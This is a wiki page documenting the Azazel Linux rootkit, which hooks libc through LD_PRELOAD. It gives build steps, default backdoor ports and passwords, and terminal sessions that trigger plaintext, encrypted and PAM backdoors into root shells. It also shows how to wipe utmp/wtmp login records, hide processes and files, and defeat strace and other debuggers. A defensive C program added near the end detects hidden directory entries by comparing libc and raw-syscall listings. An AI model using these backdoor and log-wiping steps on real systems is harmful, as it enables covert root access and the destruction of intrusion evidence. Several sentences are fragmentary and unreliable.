Azazel Rootkit Overview and Features

Azazel is a Linux userland rootkit written in C that uses the LD_PRELOAD technique to hook system calls and hide its presence. It features log cleaning, process hiding, anti-debugging techniques, and includes both plaintext and encrypted backdoors to provide remote interactive shells. The rootkit focuses on evading detection tools like lsof, ps and unhide through techniques like selectively not hooking those programs and obfuscating strings.
Azazel
Azazel is a userland rootkit written in C based off of the original LD_PRELOAD technique from Jynx rootkit. It is more robust and has additional features, [Link] include log cleaning, pcap subversion, and more.
Contents
1 Disclaimer
2 Features
3 Latest Source
4 Hooking Methods
5 Configuration
6 Backdoor Examples
6.1 Plaintext backdoor
6.2 Crypthook backdoor
6.3 PAM backdoor
7 Log Clearing
8 Anti Debugging
9 Process Hiding
10 Preliminary ldd/unhide obfuscation
11 Removal
12 Related
Disclaimer
It is a crime to use techniques or tools on this page against any system without written authorization unless the system in question belongs to you
Features
Anti debugging
Avoids unhide, lsof, ps, ldd detection
Hides files and directories
Hides remote connections
Hides processes
Hides logins
PCAP hooks avoid local sniffing
Two accept backdoors with full PTY shells.
  Crypthook encrypted accept() backdoor
  Plaintext accept() backdoor
PAM backdoor for local privesc and remote entry
Log cleanup for utmp/wtmp entries based on pty
Uses xor to obfuscate static strings
Latest Source
Clone the sources
Terminal
localhost:~$ git clone [Link]
Build the rootkit
Terminal
localhost:~$ make
Running "make install" [Link] impossible, it's an unnecessary and painful procedure, not to mention you may forget to remove it.
Hooking Methods
Azazel utilizes the same hooking methods as Jynx/[Link] execution by taking advantage of the LD_PRELOAD variable. By default, [Link] into /[Link]/etc/[Link].
Example runtime hooking of bash.
Terminal
localhost:~$ LD_PRELOAD=/lib/[Link]
Instead of dlsym'ing direct libc functions by globally declaring old_syscall, Azazel has a new structure in azazel.h named syscall_list. [Link] [Link] the preprocessor definitions also in const.h. Each definition has a prefix of SYS_name_of_function_in_caps. For example, to call libc's version of fopen, you would use syscalls[SYS_FOPEN].syscall_func()

    typedef struct struct_syscalls {
        char syscall_name[51];        /* name looked up via dlsym() */
        void *(*syscall_func)();      /* pointer to the real libc function */
    } s_syscalls;
Configuration
[Link] ciphered using an XOR key in order to not expose them to dumping programs like "strings." See below for a list of variables and their associated purpose.
The rootkit will hide all TCP/IP connections within these HIGH and LOW port ranges. These ranges are used to not only hide from netstat/lsof, but also to hide from sniffing using libpcap.

Variable(s)            | Description                                                                                | Default
LOW_PORT / HIGH_PORT   | Ports used to trigger full PTY plaintext backdoor.                                         | 61040 / 61050
CRYPT_LOW / CRYPT_HIGH | Ports used to trigger full PTY crypthook backdoor.                                         | 61051 / 61060
PAM_PORT               | Also hides this port but doesn't trigger accept backdoor.                                  | 61061
SHELL_MSG              | Display this string to users once they get a shell                                         | Welcome
SHELL_PASSWD           | Shell password for both plaintext and crypthook backdoors                                  | changeme
SHELL_TYPE             | Use this shell for accept() backdoors.                                                     | /bin/bash
MAGIC_STRING           | Hide any files with this string in the filename.                                           | __
BLIND_LOGIN            | Fake user account used to activate the PAM backdoor.                                       | rootme
ANTI_DEBUG_MSG         | Display this message to the sysadmin if they try to ptrace                                 | Don't scratch the walls.
CLEANUP_LOGS           | If this environment var is set to a valid pts, then clean up utmp/wtmp logs for that pts.  | CLEANUP_LOGS

The following variables are specifically included for the crypthook backdoor.

Variable(s)  | Description                                              | Default
PASSPHRASE   | This key is used for encryption/decryption of sessions   | HelloNSA
KEY_SALT     | Key salt used for key derivation.                        | changeme
Backdoor Examples
For each of these examples we are assuming that sshd is hooked with azazel and able to trigger any of the three operational backdoors.
Plaintext backdoor
We need to set the local port to something within the ranges of LOW_PORT and HIGH_PORT as configured [Link], but it also triggers [Link]'s p option.
Upon successfully connecting to the remote daemon, the first line you enter should be the SHELL_PASSWD that you created.
$ ncat target 22 -p 61040
changeme
Welcome!
Here's a shell.
root@host:/root #
Crypthook backdoor
Triggering the Crypthook backdoor is similar to the plaintext backdoor, but we need to speak the same protocol. Crypthook is an AES encryption wrapper for TCP/[Link] Crypthook relies on preload hooking as well, and can be used with netcat by utilizing the LD_PRELOAD environment variable.
$ LD_PRELOAD=./[Link] ncat localhost 22 -p 61051
changeme
Welcome!
Here's a shell.
root@host:/root/ #
PAM backdoor
[Link] [Link] with sshd, the connection will not be hidden unless you can force ssh client to bind to a local port within one of the [Link]'d like to hide.
$ make client
$ LD_PRELOAD=./[Link] ssh rootme@localhost
root@host:/ #
The PAM hooks can also be used for local privesc.
$ su - rootme
#
Log Clearing
Log clearing can be accomplished by setting the environment variable to the tty/pts device that you want to remove [Link] backdoors, [Link], if you need to use the PAM backdoor through SSH, you will need to manually remove your pts from the logs as demonstrated below.
$ w | grep pts/16
root pts/16 :0.0 Wed16 2:33m 0.16s 0.16s bash
$ CLEANUP_LOGS="pts/16" ls
utmp logs cleaned up.
wtmp logs cleaned up.
$ w | grep pts/16
$
Anti Debugging
Azazel hooks ptrace() and returns 1, [Link] sysadmin is really more of a joke than anything and will definitely set off alarms that something is wrong.
$ strace -p $PPID
Don't scratch the walls
This works on any userland debugger (ltrace, strace, gdb, ftrace). This hook could be easily extended to hide specific information should you desire to do so.
Process Hiding
Jynx/[Link] using this method, so Azazel addresses this by again using environment variables to mask any processes that may [Link], but defaults to HIDE_THIS_SHELL.
$ env HIDE_THIS_SHELL=plz ncat -l -p 61061
When this environment variable is set, [Link] [Link], you have to use this environment variable to access hidden files.
Preliminary ldd/unhide obfuscation
[Link] are done, [Link] library, [Link] antidebug/ldd/unhide obfuscation.
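As an added defensive example (not code from the Azazel project or from this page), the following Linux C program applies the cross-view check that unhide-style tools rely on against the process and file hiding described in the two sections above: it lists a directory once through libc's opendir()/readdir(), which an LD_PRELOAD library can interpose, and once through the raw openat/getdents64 syscalls, which userland hooks cannot reach, and reports entries present only in the raw view. The function names (raw_list, count_hidden) and the glibc/Linux assumption are mine.

```c
#define _GNU_SOURCE
#include <dirent.h>
#include <fcntl.h>
#include <stdio.h>
#include <string.h>
#include <sys/syscall.h>
#include <unistd.h>

enum { MAX_ENTRIES = 4096, NAME_LEN = 256 };

/* Record layout returned by the Linux getdents64 syscall. */
struct linux_dirent64 { unsigned long long d_ino; long long d_off;
                        unsigned short d_reclen; unsigned char d_type; char d_name[]; };

/* List `path` via raw syscalls only (openat/getdents64/close): an LD_PRELOAD hook
 * on opendir()/readdir() cannot filter this view. Returns the count, or -1. */
static int raw_list(const char *path, char names[][NAME_LEN]) {
    char buf[32768] __attribute__((aligned(8)));
    int fd = (int)syscall(SYS_openat, AT_FDCWD, path, O_RDONLY | O_DIRECTORY, 0), n = 0;
    if (fd < 0) return -1;
    for (long got; (got = syscall(SYS_getdents64, fd, buf, sizeof buf)) > 0;)
        for (long off = 0; off < got && n < MAX_ENTRIES; n++) {
            struct linux_dirent64 *d = (struct linux_dirent64 *)(buf + off);
            snprintf(names[n], NAME_LEN, "%s", d->d_name);
            off += d->d_reclen;
        }
    syscall(SYS_close, fd);
    return n;
}
/* Count entries the kernel reports but libc's readdir() omits (-1 on error).
 * Nonzero on /proc or a data directory indicates a userland readdir hook; on /proc,
 * re-run to rule out PIDs that exited between the two listings. */
int count_hidden(const char *path) {
    static char raw[MAX_ENTRIES][NAME_LEN], seen[MAX_ENTRIES];
    int nr = raw_list(path, raw), hidden = 0;
    DIR *dir = opendir(path);               /* the hookable libc path */
    struct dirent *e;
    if (nr < 0 || !dir) { if (dir) closedir(dir); return -1; }
    memset(seen, 0, sizeof seen);
    while ((e = readdir(dir)) != NULL)
        for (int i = 0; i < nr; i++)
            if (!seen[i] && strcmp(raw[i], e->d_name) == 0) { seen[i] = 1; break; }
    closedir(dir);
    for (int i = 0; i < nr; i++)
        if (!seen[i]) { printf("hidden from libc: %s/%s\n", path, raw[i]); hidden++; }
    return hidden;
}
int main(int argc, char **argv) {            /* usage: ./hidecheck [dir], default /proc */
    return count_hidden(argc > 1 ? argv[1] : "/proc") != 0;
}
```

The check only proves something about the process it runs in, so a preloaded library that exempts specific program names (as the page says Azazel does for ps, lsof and unhide) still has to hook this binary to defeat it; a clean system returns 0 for every directory.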
Removal
To remove Azazel, the best course of action is to boot into a live cd, mount your bootable hard drive, and delete the /etc/ld_preload.so file from the partition.
Related
Linux
LD_PRELOAD
C
CryptHook ([Link]
Jynx
Hooking PAM
Retrieved from "[Link]
This page was last modified on 14 February 2014, at 02:34.
